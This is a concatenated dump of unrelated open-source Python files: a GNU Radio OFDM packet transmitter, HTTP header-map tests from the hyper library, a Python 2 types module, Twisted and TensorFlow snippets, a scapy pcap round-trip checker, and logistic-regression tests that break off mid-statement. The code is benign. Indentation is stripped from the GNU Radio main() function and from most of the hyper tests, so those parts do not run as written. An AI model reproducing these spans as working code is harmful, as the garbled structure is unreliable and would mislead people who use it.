# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, blks2
from gnuradio import usrp
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import time, struct, sys
# from current dir
from transmit_path import transmit_path
from pick_bitrate import pick_tx_bitrate
import fusb_options
class my_top_block(gr.top_block):
    """Top-level GNU Radio flow graph: an OFDM transmit path feeding a
    USRP sink.  Construction fails (SystemExit) when no Tx frequency was
    given on the command line."""

    def __init__(self, options):
        gr.top_block.__init__(self)

        self._tx_freq = options.tx_freq # transmitter's center frequency
        self._tx_subdev_spec = options.tx_subdev_spec # daughterboard to use
        self._interp = options.interp # interpolating rate for the USRP (prelim)
        self._fusb_block_size = options.fusb_block_size # usb info for USRP
        self._fusb_nblocks = options.fusb_nblocks # usb info for USRP

        if self._tx_freq is None:
            sys.stderr.write("-f FREQ or --freq FREQ or --tx-freq FREQ must be specified\n")
            raise SystemExit

        # Set up USRP sink; also adjusts interp, and bitrate
        self._setup_usrp_sink()

        # copy the final answers back into options for use by modulator
        #options.bitrate = self._bitrate

        self.txpath = transmit_path(options)

        # Wire the modulated samples into the USRP sink.
        self.connect(self.txpath, self.u)

    def _setup_usrp_sink(self):
        """
        Creates a USRP sink, determines the settings for best bitrate,
        and attaches to the transmitter's subdevice.
        """
        self.u = usrp.sink_c(fusb_block_size=self._fusb_block_size,
                             fusb_nblocks=self._fusb_nblocks)

        self.u.set_interp_rate(self._interp)

        # determine the daughterboard subdevice we're using
        if self._tx_subdev_spec is None:
            self._tx_subdev_spec = usrp.pick_tx_subdevice(self.u)
        self.u.set_mux(usrp.determine_tx_mux_value(self.u, self._tx_subdev_spec))
        self.subdev = usrp.selected_subdev(self.u, self._tx_subdev_spec)

        # Set center frequency of USRP
        ok = self.set_freq(self._tx_freq)
        if not ok:
            print "Failed to set Tx frequency to %s" % (eng_notation.num_to_str(self._tx_freq),)
            raise ValueError

        # Set the USRP for maximum transmit gain
        # (Note that on the RFX cards this is a nop.)
        self.set_gain(self.subdev.gain_range()[1])

        # enable Auto Transmit/Receive switching
        self.set_auto_tr(True)

    def set_freq(self, target_freq):
        """
        Set the center frequency we're interested in.

        @param target_freq: frequency in Hz
        @rtype: bool

        Tuning is a two step process.  First we ask the front-end to
        tune as close to the desired frequency as it can.  Then we use
        the result of that operation and our target_frequency to
        determine the value for the digital up converter.
        """
        r = self.u.tune(self.subdev.which(), self.subdev, target_freq)
        if r:
            return True

        return False

    def set_gain(self, gain):
        """
        Sets the analog gain in the USRP
        """
        self.gain = gain
        self.subdev.set_gain(gain)

    def set_auto_tr(self, enable):
        """
        Turns on auto transmit/receive of USRP daughterboard (if exits; else ignored)
        """
        return self.subdev.set_auto_tr(enable)

    def interp(self):
        # FPGA interpolation rate chosen at construction time.
        return self._interp

    def add_options(normal, expert):
        """
        Adds usrp-specific options to the Options Parser
        """
        add_freq_option(normal)
        normal.add_option("-T", "--tx-subdev-spec", type="subdev", default=None,
                          help="select USRP Tx side A or B")
        normal.add_option("-v", "--verbose", action="store_true", default=False)

        expert.add_option("", "--tx-freq", type="eng_float", default=None,
                          help="set transmit frequency to FREQ [default=%default]", metavar="FREQ")
        expert.add_option("-i", "--interp", type="intx", default=256,
                          help="set fpga interpolation rate to INTERP [default=%default]")
    # Make a static method to call before instantiation
    add_options = staticmethod(add_options)

    def _print_verbage(self):
        """
        Prints information about the transmit path
        """
        # NOTE(review): self._modulator_class is never assigned in __init__,
        # so this method looks like it would raise AttributeError if called
        # on this class -- confirm before relying on it.
        print "Using TX d'board %s" % (self.subdev.side_and_name(),)
        print "modulation:      %s" % (self._modulator_class.__name__)
        print "interp:          %3d" % (self._interp)
        print "Tx Frequency:    %s" % (eng_notation.num_to_str(self._tx_freq))
def add_freq_option(parser):
    """
    Hackery that has the -f / --freq option set both tx_freq and rx_freq
    """
    def freq_callback(option, opt_str, value, parser):
        parser.values.rx_freq = value
        parser.values.tx_freq = value

    # Guard clause: another module may have registered --freq already.
    if parser.has_option('--freq'):
        return
    parser.add_option('-f', '--freq', type="eng_float",
                      action="callback", callback=freq_callback,
                      help="set Tx and/or Rx frequency to FREQ [default=%default]",
                      metavar="FREQ")
# /////////////////////////////////////////////////////////////////////////////
# main
# /////////////////////////////////////////////////////////////////////////////
def main():
def send_pkt(payload='', eof=False):
return tb.txpath.send_pkt(payload, eof)
parser = OptionParser(option_class=eng_option, conflict_handler="resolve")
expert_grp = parser.add_option_group("Expert")
parser.add_option("-s", "--size", type="eng_float", default=400,
help="set packet size [default=%default]")
parser.add_option("-M", "--megabytes", type="eng_float", default=1.0,
help="set megabytes to transmit [default=%default]")
parser.add_option("","--discontinuous", action="store_true", default=False,
help="enable discontinuous mode")
my_top_block.add_options(parser, expert_grp)
transmit_path.add_options(parser, expert_grp)
blks2.ofdm_mod.add_options(parser, expert_grp)
blks2.ofdm_demod.add_options(parser, expert_grp)
fusb_options.add_options(expert_grp)
(options, args) = parser.parse_args ()
# build the graph
tb = my_top_block(options)
r = gr.enable_realtime_scheduling()
if r != gr.RT_OK:
print "Warning: failed to enable realtime scheduling"
tb.start() # start flow graph
# generate and send packets
nbytes = int(1e6 * options.megabytes)
n = 0
pktno = 0
pkt_size = int(options.size)
while n < nbytes:
send_pkt(struct.pack('!H', pktno) + (pkt_size - 2) * chr(pktno & 0xff))
n += pkt_size
sys.stderr.write('.')
if options.discontinuous and pktno % 5 == 1:
time.sleep(1)
pktno += 1
send_pkt(eof=True)
tb.wait() # wait for it to finish
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Allow a clean Ctrl-C exit without a traceback.
        pass
| gpl-3.0 |
Lukasa/hyper | test/test_headers.py | 4 | 6779 | from __future__ import unicode_literals
from hyper.common.headers import HTTPHeaderMap
import pytest
class TestHTTPHeaderMap(object):
def test_header_map_can_insert_single_header(self):
h = HTTPHeaderMap()
h['key'] = 'value'
assert h['key'] == [b'value']
def test_header_map_insensitive_key(self):
h = HTTPHeaderMap()
h['KEY'] = 'value'
assert h['key'] == [b'value']
def test_header_map_is_iterable_in_order(self):
h = HTTPHeaderMap()
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
for k, v in items:
h[k] = v
for i, pair in enumerate(h):
assert items[i] == pair
def test_header_map_allows_multiple_values(self):
h = HTTPHeaderMap()
h['key'] = b'v1'
h[b'Key'] = b'v2'
assert h['key'] == [b'v1', b'v2']
def test_header_map_can_delete_value(self):
h = HTTPHeaderMap()
h['key'] = b'v1'
del h[b'key']
with pytest.raises(KeyError):
h[b'key']
def test_header_map_deletes_all_values(self):
h = HTTPHeaderMap()
h['key'] = 'v1'
h['key'] = 'v2'
del h['key']
with pytest.raises(KeyError):
h['key']
def test_setting_comma_separated_header(self):
h = HTTPHeaderMap()
h['key'] = 'v1, v2'
assert h[b'key'] == [b'v1', b'v2']
def test_containment(self):
h = HTTPHeaderMap()
h['key'] = 'val'
assert 'key' in h
assert b'key' in h
assert 'nonkey' not in h
def test_length_counts_lines_separately(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(h) == 4
def test_keys(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(list(h.keys())) == 4
assert list(h.keys()) == [b'k1', b'k1', b'k2', b'k1']
def test_values(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(list(h.values())) == 4
assert list(h.values()) == [b'v1', b'v2', b'v3', b'v4']
def test_items(self):
h = HTTPHeaderMap()
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
for k, v in items:
h[k] = v
for i, pair in enumerate(h.items()):
assert items[i] == pair
def test_empty_get(self):
h = HTTPHeaderMap()
assert h.get('nonexistent', 'hi there') == 'hi there'
def test_actual_get(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert h.get('k1') == [b'v1', b'v2', b'v4']
    def test_doesnt_split_set_cookie(self):
        # Set-Cookie values can legitimately contain commas (e.g. in expiry
        # dates), so unlike other headers they must NOT be split on ', '.
        h = HTTPHeaderMap()
        h['Set-Cookie'] = 'v1, v2'
        assert h['set-cookie'] == [b'v1, v2']
        assert h.get(b'set-cookie') == [b'v1, v2']
def test_equality(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1, v2'
h2['k2'] = 'v3'
h2['k1'] = 'v4'
assert h1 == h2
def test_inequality_of_raw_ordering(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1'
h2['k1'] = 'v2'
h2['k2'] = 'v3'
h2['k1'] = 'v4'
assert h1 != h2
def test_inequality(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1'
h2['k1'] = 'v4'
h2['k1'] = 'v2'
h2['k2'] = 'v3'
assert h1 != h2
def test_deleting_nonexistent(self):
h = HTTPHeaderMap()
with pytest.raises(KeyError):
del h['key']
def test_can_create_from_iterable(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items)
assert list(h) == items
def test_can_create_from_multiple_iterables(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items, items, items)
assert list(h) == items + items + items
def test_create_from_iterables_and_kwargs(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
h = list(HTTPHeaderMap(items, k3='v4', k4='v5'))
# kwargs are an unordered dictionary, so allow for both possible
# iteration orders.
assert (
h == items + [(b'k3', b'v4'), (b'k4', b'v5')] or
h == items + [(b'k4', b'v5'), (b'k3', b'v4')]
)
def test_raw_iteration(self):
items = [
(b'k1', b'v2'),
(b'k2', b'v2, v3, v4'),
(b'k2', b'v3'),
]
h = HTTPHeaderMap(items)
assert list(h.iter_raw()) == items
def test_headers_must_be_strings(self):
with pytest.raises(ValueError):
HTTPHeaderMap(key=1)
h = HTTPHeaderMap()
with pytest.raises(ValueError):
h['k'] = 1
with pytest.raises(ValueError):
h[1] = 'v'
def test_merge_self_is_no_op(self):
h = HTTPHeaderMap([(b'hi', b'there')])
h.merge(h)
assert h == HTTPHeaderMap([(b'hi', b'there')])
def test_merge_headermaps_preserves_raw(self):
h1 = HTTPHeaderMap([
(b'hi', b'there')
])
h2 = HTTPHeaderMap([
(b'Hi', b'there, sir, maam')
])
h1.merge(h2)
assert list(h1.iter_raw()) == [
(b'hi', b'there'),
(b'Hi', b'there, sir, maam'),
]
def test_merge_header_map_dict(self):
h = HTTPHeaderMap([(b'hi', b'there')])
d = {'cat': 'dog'}
h.merge(d)
assert list(h.items()) == [
(b'hi', b'there'),
(b'cat', b'dog'),
]
def test_replacing(self):
h = HTTPHeaderMap([
(b'name', b'value'),
(b'name2', b'value2'),
(b'name2', b'value2'),
(b'name3', b'value3'),
])
h.replace('name2', '42')
h.replace('name4', 'other_value')
assert list(h.items()) == [
(b'name', b'value'),
(b'name2', b'42'),
(b'name3', b'value3'),
(b'name4', b'other_value'),
]
| mit |
papados/ordersys | Lib/types.py | 304 | 2040 | """Define names for all type symbols known in the standard interpreter.
Types that are part of optional modules (e.g. array) are not listed.
"""
import sys
# Iterators in Python aren't a matter of type but of protocol. A large
# and changing number of builtin types implement *some* flavor of
# iterator. Don't check the type! Use hasattr to check for both
# "__iter__" and "next" attributes instead.
# Derive each type object from a representative value rather than naming
# it directly; this is the historical Python 2 ``types`` module idiom.
NoneType = type(None)
TypeType = type
ObjectType = object

IntType = int
LongType = long  # Python 2 arbitrary-precision integer
FloatType = float
BooleanType = bool
try:
    ComplexType = complex
except NameError:
    # Interpreter built without complex-number support.
    pass

StringType = str

# StringTypes is already outdated. Instead of writing "type(x) in
# types.StringTypes", you should use "isinstance(x, basestring)". But
# we keep around for compatibility with Python 2.2.
try:
    UnicodeType = unicode
    StringTypes = (StringType, UnicodeType)
except NameError:
    # Interpreter built without Unicode support.
    StringTypes = (StringType,)

BufferType = buffer

TupleType = tuple
ListType = list
DictType = DictionaryType = dict

def _f(): pass
FunctionType = type(_f)
LambdaType = type(lambda: None)  # Same as FunctionType
CodeType = type(_f.func_code)

def _g():
    yield 1
GeneratorType = type(_g())

class _C:
    def _m(self): pass
ClassType = type(_C)  # old-style class
UnboundMethodType = type(_C._m)  # Same as MethodType
_x = _C()
InstanceType = type(_x)
MethodType = type(_x._m)

BuiltinFunctionType = type(len)
BuiltinMethodType = type([].append)  # Same as BuiltinFunctionType

ModuleType = type(sys)
FileType = file
XRangeType = xrange

# Raise and catch an exception purely to obtain a live traceback object,
# from which the traceback and frame types can be derived.
try:
    raise TypeError
except TypeError:
    tb = sys.exc_info()[2]
    TracebackType = type(tb)
    FrameType = type(tb.tb_frame)
    del tb

SliceType = slice
EllipsisType = type(Ellipsis)

DictProxyType = type(TypeType.__dict__)
NotImplementedType = type(NotImplemented)

# For Jython, the following two types are identical
GetSetDescriptorType = type(FunctionType.func_code)
MemberDescriptorType = type(FunctionType.func_globals)

del sys, _f, _g, _C, _x  # Not for export
| unlicense |
imsparsh/python-for-android | python-modules/twisted/twisted/web/test/test_util.py | 49 | 1599 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.util}.
"""
from twisted.trial.unittest import TestCase
from twisted.web.util import _hasSubstring
class HasSubstringTestCase(TestCase):
    """
    Test regular expression-based substring searching.
    """

    def test_hasSubstring(self):
        """
        L{_hasSubstring} returns True if the specified substring is present in
        the text being searched.
        """
        # "foo" is bounded by non-alphanumeric characters, so it matches.
        self.assertTrue(_hasSubstring("foo", "<foo>"))

    def test_hasSubstringWithoutMatch(self):
        """
        L{_hasSubstring} returns False if the specified substring is not
        present in the text being searched.
        """
        self.assertFalse(_hasSubstring("foo", "<bar>"))

    def test_hasSubstringOnlyMatchesStringsWithNonAlphnumericNeighbors(self):
        """
        L{_hasSubstring} returns False if the specified substring is present
        in the text being searched but the characters surrounding the
        substring are alphanumeric.
        """
        # Matching is word-boundary-like: alphanumeric neighbours suppress it.
        self.assertFalse(_hasSubstring("foo", "barfoobaz"))
        self.assertFalse(_hasSubstring("foo", "1foo2"))

    def test_hasSubstringEscapesKey(self):
        """
        L{_hasSubstring} uses a regular expression to determine if a substring
        exists in a text snippet. The substring is escaped to ensure that it
        doesn't interfere with the regular expression.
        """
        # "[b-a]" would be an invalid character class if left unescaped.
        self.assertTrue(_hasSubstring("[b-a]",
                                      "Python can generate names like [b-a]."))
| apache-2.0 |
lthurlow/python-tcpsnoop | scapy/tools/check_asdis.py | 27 | 2854 | #! /usr/bin/env python
import getopt
def usage():
    # Print command-line help to stderr. (Legacy Python 2 print syntax.)
    print >>sys.stderr,"""Usage: check_asdis -i <pcap_file> [-o <wrong_packets.pcap>]
-v increase verbosity
-d hexdiff packets that differ
-z compress output pcap
-a open pcap file in append mode"""


def main(argv):
    """Re-dissect and re-assemble every packet of a pcap file, reporting
    packets whose round-trip (parse then serialize) does not reproduce the
    original bytes; optionally write the offending packets to another pcap.

    NOTE: Python 2 code (print statements, ``except X, e`` syntax).
    """
    PCAP_IN = None
    PCAP_OUT = None
    COMPRESS = False
    APPEND = False
    DIFF = False
    VERBOSE = 0
    try:
        opts = getopt.getopt(argv, "hi:o:azdv")
        for opt, parm in opts[0]:
            if opt == "-h":
                usage()
                raise SystemExit
            elif opt == "-i":
                PCAP_IN = parm
            elif opt == "-o":
                PCAP_OUT = parm
            elif opt == "-v":
                VERBOSE += 1
            elif opt == "-d":
                DIFF = True
            elif opt == "-a":
                APPEND = True
            elif opt == "-z":
                COMPRESS = True
        if PCAP_IN is None:
            raise getopt.GetoptError("Missing pcap file (-i)")
    except getopt.GetoptError,e:
        print >>sys.stderr,"ERROR: %s" % e
        raise SystemExit

    # Imported here (not at module top) so option errors are reported even
    # if scapy itself is broken or slow to import.
    from scapy.config import conf
    from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff
    from scapy.layers import all

    pcap = RawPcapReader(PCAP_IN)
    pcap_out = None
    if PCAP_OUT:
        pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype)
        pcap_out._write_header(None)

    # Map the pcap link type to the matching layer-2 dissector class.
    LLcls = conf.l2types.get(pcap.linktype)
    if LLcls is None:
        print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype
        raise SystemExit

    i = -1
    differ = 0
    failed = 0
    for p1, meta in pcap:
        i += 1
        try:
            p2d = LLcls(p1)   # dissect the raw bytes
            p2 = str(p2d)     # re-assemble them
        except KeyboardInterrupt:
            raise
        except Exception,e:
            print "Dissection error on packet %i" % i
            failed += 1
        else:
            if p1 == p2:
                if VERBOSE >= 2:
                    print "Packet %i ok" % i
                # Round-trip succeeded: skip the "wrong packet" output below.
                continue
            else:
                print "Packet %i differs" % i
                differ += 1
                if VERBOSE >= 1:
                    print repr(p2d)
                if DIFF:
                    hexdiff(p1, p2)
        # Reached only for packets that differed or failed to dissect.
        if pcap_out is not None:
            pcap_out.write(p1)
    i += 1  # convert last index into a packet count
    correct = i - differ - failed
    # "i and ..." guards against division by zero on an empty capture.
    print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ,
                                                                                failed, i and 100.0*(correct)/i)


if __name__ == "__main__":
    import sys
    try:
        main(sys.argv[1:])
    except KeyboardInterrupt:
        print >>sys.stderr,"Interrupted by user."
| mit |
guschmue/tensorflow | tensorflow/examples/adding_an_op/zero_out_grad_2.py | 184 | 1662 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The gradient of the tutorial zero_out op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import sparse_ops
@ops.RegisterGradient("ZeroOut")
def _zero_out_grad(op, grad):
  """The gradients for `zero_out`.

  The incoming gradient of the first output element is scattered back to
  the first input position; every other input position gets gradient 0.

  Args:
    op: The `zero_out` `Operation` that we are differentiating, which we can
      use to find the inputs and outputs of the original op.
    grad: Gradient with respect to the output of the `zero_out` op.

  Returns:
    Gradients with respect to the input of `zero_out`.
  """
  input_tensor = op.inputs[0]
  input_shape = array_ops.shape(input_tensor)
  # An all-zero index vector, i.e. the position [0, 0, ..., 0].
  leading_index = array_ops.zeros_like(input_shape)
  # Incoming gradient for the first element of the (flattened) output.
  grad_of_first = array_ops.reshape(grad, [-1])[0]
  # Dense tensor that is zero everywhere except at the leading position.
  return [sparse_ops.sparse_to_dense([leading_index], input_shape,
                                     grad_of_first, 0)]
| apache-2.0 |
Dekken/tick | tick/linear_model/tests/logistic_regression_test.py | 2 | 24388 | # License: BSD 3 clause
import itertools
import unittest
import numpy as np
from sklearn.metrics.ranking import roc_auc_score
from tick.base.inference import InferenceTest
from tick.linear_model import SimuLogReg, LogisticRegression
from tick.simulation import weights_sparse_gauss
from tick.preprocessing.features_binarizer import FeaturesBinarizer
from tick.prox import ProxZero, ProxL1, ProxL2Sq, ProxElasticNet, ProxTV, \
ProxBinarsity
solvers = ['gd', 'agd', 'sgd', 'sdca', 'bfgs', 'svrg']
penalties = ['none', 'l2', 'l1', 'tv', 'elasticnet', 'binarsity']
class Test(InferenceTest):
def setUp(self):
self.float_1 = 5.23e-4
self.float_2 = 3.86e-2
self.int_1 = 3198
self.int_2 = 230
self.X = np.zeros((5, 5))
self.y = np.zeros(5)
self.y[0] = 1
    @staticmethod
    def get_train_data(n_features=20, n_samples=3000, nnz=5):
        """Simulate a reproducible logistic-regression training set.

        Draws a sparse Gaussian ground-truth weight vector with ``nnz``
        non-zero coefficients and a fixed intercept of 0.1, then samples
        ``(features, labels)`` from ``SimuLogReg``.
        """
        np.random.seed(12)  # fixed seed so every test sees the same data
        weights0 = weights_sparse_gauss(n_features, nnz=nnz)
        interc0 = 0.1
        features, y = SimuLogReg(weights0, interc0, n_samples=n_samples,
                                 verbose=False).simulate()
        return features, y
def test_LogisticRegression_fit(self):
"""...Test LogisticRegression fit with different solvers and penalties
"""
sto_seed = 179312
raw_features, y = Test.get_train_data()
for fit_intercept in [True, False]:
for penalty in penalties:
if penalty == 'binarsity':
# binarize features
n_cuts = 3
binarizer = FeaturesBinarizer(n_cuts=n_cuts)
features = binarizer.fit_transform(raw_features)
else:
features = raw_features
for solver in solvers:
solver_kwargs = {
'penalty': penalty,
'tol': 1e-5,
'solver': solver,
'verbose': False,
'max_iter': 10,
'fit_intercept': fit_intercept
}
if penalty != 'none':
solver_kwargs['C'] = 100
if penalty == 'binarsity':
solver_kwargs['blocks_start'] = binarizer.blocks_start
solver_kwargs[
'blocks_length'] = binarizer.blocks_length
if solver == 'sdca':
solver_kwargs['sdca_ridge_strength'] = 2e-2
if solver in ['sgd', 'svrg', 'sdca']:
solver_kwargs['random_state'] = sto_seed
if solver == 'sgd':
solver_kwargs['step'] = 1.
if solver == 'bfgs':
# BFGS only accepts ProxZero and ProxL2sq for now
if penalty not in ['none', 'l2']:
continue
learner = LogisticRegression(**solver_kwargs)
learner.fit(features, y)
probas = learner.predict_proba(features)[:, 1]
auc = roc_auc_score(y, probas)
self.assertGreater(
auc, 0.7, "solver %s with penalty %s and "
"intercept %s reached too low AUC" % (solver, penalty,
fit_intercept))
def test_LogisticRegression_warm_start(self):
"""...Test LogisticRegression warm start
"""
sto_seed = 179312
X, y = Test.get_train_data()
fit_intercepts = [True, False]
cases = itertools.product(solvers, fit_intercepts)
for solver, fit_intercept in cases:
solver_kwargs = {
'solver': solver,
'max_iter': 2,
'fit_intercept': fit_intercept,
'warm_start': True,
'tol': 0
}
if solver == 'sdca':
msg = '^SDCA cannot be warm started$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(**solver_kwargs)
else:
if solver in ['sgd', 'svrg']:
solver_kwargs['random_state'] = sto_seed
if solver == 'sgd':
solver_kwargs['step'] = .3
learner = LogisticRegression(**solver_kwargs)
learner.fit(X, y)
if fit_intercept:
coeffs_1 = np.hstack((learner.weights, learner.intercept))
else:
coeffs_1 = learner.weights
learner.fit(X, y)
if fit_intercept:
coeffs_2 = np.hstack((learner.weights, learner.intercept))
else:
coeffs_2 = learner.weights
# Thanks to warm start objective should have decreased
self.assertLess(
learner._solver_obj.objective(coeffs_2),
learner._solver_obj.objective(coeffs_1))
@staticmethod
def specific_solver_kwargs(solver):
"""...A simple method to as systematically some kwargs to our tests
"""
return dict()
def test_LogisticRegression_settings(self):
"""...Test LogisticRegression basic settings
"""
# solver
from tick.solver import AGD, GD, BFGS, SGD, SVRG, SDCA
solver_class_map = {
'gd': GD,
'agd': AGD,
'sgd': SGD,
'svrg': SVRG,
'bfgs': BFGS,
'sdca': SDCA
}
for solver in solvers:
learner = LogisticRegression(solver=solver,
**Test.specific_solver_kwargs(solver))
solver_class = solver_class_map[solver]
self.assertTrue(isinstance(learner._solver_obj, solver_class))
msg = '^``solver`` must be one of agd, bfgs, gd, sdca, sgd, ' \
'svrg, got wrong_name$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(solver='wrong_name')
# prox
prox_class_map = {
'none': ProxZero,
'l1': ProxL1,
'l2': ProxL2Sq,
'elasticnet': ProxElasticNet,
'tv': ProxTV,
'binarsity': ProxBinarsity
}
for penalty in penalties:
if penalty == 'binarsity':
learner = LogisticRegression(penalty=penalty, blocks_start=[0],
blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
prox_class = prox_class_map[penalty]
self.assertTrue(isinstance(learner._prox_obj, prox_class))
msg = '^``penalty`` must be one of binarsity, elasticnet, l1, l2, none, ' \
'tv, got wrong_name$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(penalty='wrong_name')
def test_LogisticRegression_model_settings(self):
"""...Test LogisticRegression setting of parameters of model
"""
for solver in solvers:
learner = LogisticRegression(fit_intercept=True, solver=solver)
self.assertEqual(learner.fit_intercept, True)
self.assertEqual(learner._model_obj.fit_intercept, True)
learner.fit_intercept = False
self.assertEqual(learner.fit_intercept, False)
self.assertEqual(learner._model_obj.fit_intercept, False)
learner = LogisticRegression(fit_intercept=False, solver=solver)
self.assertEqual(learner.fit_intercept, False)
self.assertEqual(learner._model_obj.fit_intercept, False)
learner.fit_intercept = True
self.assertEqual(learner.fit_intercept, True)
self.assertEqual(learner._model_obj.fit_intercept, True)
def test_LogisticRegression_penalty_C(self):
"""...Test LogisticRegression setting of parameter of C
"""
for penalty in penalties:
if penalty != 'none':
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, C=self.float_1, blocks_start=[0],
blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty,
C=self.float_1)
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_1)
learner.C = self.float_2
self.assertEqual(learner.C, self.float_2)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_2)
msg = '^``C`` must be positive, got -1$'
with self.assertRaisesRegex(ValueError, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty, C=-1,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty, C=-1)
else:
msg = '^You cannot set C for penalty "%s"$' % penalty
with self.assertWarnsRegex(RuntimeWarning, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty, C=self.float_1,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty, C=self.float_1)
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, blocks_start=[0], blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.C = self.float_1
msg = '^``C`` must be positive, got -2$'
with self.assertRaisesRegex(ValueError, msg):
learner.C = -2
def test_LogisticRegression_penalty_elastic_net_ratio(self):
"""...Test LogisticRegression setting of parameter of elastic_net_ratio
"""
ratio_1 = 0.6
ratio_2 = 0.3
for penalty in penalties:
if penalty == 'elasticnet':
learner = LogisticRegression(penalty=penalty, C=self.float_1,
elastic_net_ratio=ratio_1)
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner.elastic_net_ratio, ratio_1)
self.assertEqual(learner._prox_obj.strength, 1. / self.float_1)
self.assertEqual(learner._prox_obj.ratio, ratio_1)
learner.elastic_net_ratio = ratio_2
self.assertEqual(learner.C, self.float_1)
self.assertEqual(learner.elastic_net_ratio, ratio_2)
self.assertEqual(learner._prox_obj.ratio, ratio_2)
else:
msg = '^Penalty "%s" has no elastic_net_ratio attribute$$' % \
penalty
with self.assertWarnsRegex(RuntimeWarning, msg):
if penalty == 'binarsity':
LogisticRegression(penalty=penalty,
elastic_net_ratio=0.8,
blocks_start=[0], blocks_length=[1])
else:
LogisticRegression(penalty=penalty,
elastic_net_ratio=0.8)
if penalty == 'binarsity':
learner = LogisticRegression(
penalty=penalty, blocks_start=[0], blocks_length=[1])
else:
learner = LogisticRegression(penalty=penalty)
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.elastic_net_ratio = ratio_1
def test_LogisticRegression_solver_basic_settings(self):
"""...Test LogisticRegression setting of basic parameters of solver
"""
for solver in solvers:
# tol
learner = LogisticRegression(solver=solver, tol=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.tol, self.float_1)
self.assertEqual(learner._solver_obj.tol, self.float_1)
learner.tol = self.float_2
self.assertEqual(learner.tol, self.float_2)
self.assertEqual(learner._solver_obj.tol, self.float_2)
# max_iter
learner = LogisticRegression(solver=solver, max_iter=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.max_iter, self.int_1)
self.assertEqual(learner._solver_obj.max_iter, self.int_1)
learner.max_iter = self.int_2
self.assertEqual(learner.max_iter, self.int_2)
self.assertEqual(learner._solver_obj.max_iter, self.int_2)
# verbose
learner = LogisticRegression(solver=solver, verbose=True,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.verbose, True)
self.assertEqual(learner._solver_obj.verbose, True)
learner.verbose = False
self.assertEqual(learner.verbose, False)
self.assertEqual(learner._solver_obj.verbose, False)
learner = LogisticRegression(solver=solver, verbose=False,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.verbose, False)
self.assertEqual(learner._solver_obj.verbose, False)
learner.verbose = True
self.assertEqual(learner.verbose, True)
self.assertEqual(learner._solver_obj.verbose, True)
# print_every
learner = LogisticRegression(solver=solver, print_every=self.int_1,
